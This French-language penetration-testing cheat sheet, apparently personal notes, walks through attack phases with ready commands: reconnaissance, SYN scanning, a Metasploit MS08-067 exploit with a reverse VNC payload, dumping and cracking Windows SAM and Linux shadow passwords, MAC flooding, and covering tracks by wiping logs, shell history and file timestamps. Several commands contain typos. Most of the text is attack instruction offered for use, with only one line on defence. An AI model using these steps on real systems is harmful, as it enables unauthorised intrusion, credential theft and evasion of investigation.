Pour attaquer une cible, il faut d'abord la connaître et cela se réalise en plusieurs étape (et de manière cyclique) :
Instervention sur les sites :
mkdir files ./metagoofil.py -d syngress.com -t pdf,doc,xls,pptx -n 20 -o files -f results.html
Intervention sur les DNS :
apt-get install fierce
Cette deuxième phase consiste à associer aux adresses IP des ports et des services.
Ces différents types de scan sont décrit ici : https://www.information-security.fr/les-scans-ports-via-tcp-xmas-null-ack/
Cette troisième phase concerne l'exploitation / le crackage / le force brute d'un accès au départ non autorisé.
hping3 -i ul -S -p 80 192.168.42.1
Pour contrer la commande ci-dessus: il faut ajouter une règle de filtrage spécifique au blocage des paquets SYN.
Exemple d'utilisation :
search ms08-067 use exploit/windows/smb/ms08_067_netcpi show payloads set payload window/vncinject/reverse_tcp show options set RHOST 192.168.1.10 set LHOST 192.168.1.50 exploit
Les bind = exploit et connexion vers la cible les reverse = exploit vers la cible et la connexion vers l'attaquant
Pour aller plus loin, il existe meterpreter et Armitage qui est comme metasploit mais en mode graphique.
Récupérer les mots de passe windows :
Récup des fichiers SAM et SYSTEM dans /windows/System32/config/ puis :
samdump2 SYSTEM SAM > mdp.txt John mdp.txt --format=nt (?)
Redéfinir la config des utilisateurs :
chntpw -i /Windows/System32/config/SAM
Récupérer les mots de passe Linux :
unshadow /etc/passwd /etc/shadow > mdp.txt john mdp.txt
Flood sur un commutateur :
macof -i eth0 -s IP_source -d IP_destination
Scan de vulnérabilités effectué par nikto :
mikto -h ip_distante -p 80,443
Outils :
Il faut repérer la date d'accès au système, puis éffacer dans les fichiers de logs (/var/logs/wtmp, var/log/auth.log, /var/log/syslog eventuellement ) et logs applicatifs suivant leur configurations. Ce n'est pas simple pour utmp et wtmp, car ils sont dans un format particulier, qui nécessite un programme dédié (clear + utmpdump + …) Supprimer l'historique de l'utilisateur (~/.bash_history si on est en bash et celui de root). Changer les dates de modification et de lecture des fichiers édités pour leur remettre l'ancienne date (touch m a t <date>). Néanmoins, une trace reste visible avec la commande stat Enfin, à la déconnexion, de nouvelles logs seront posés.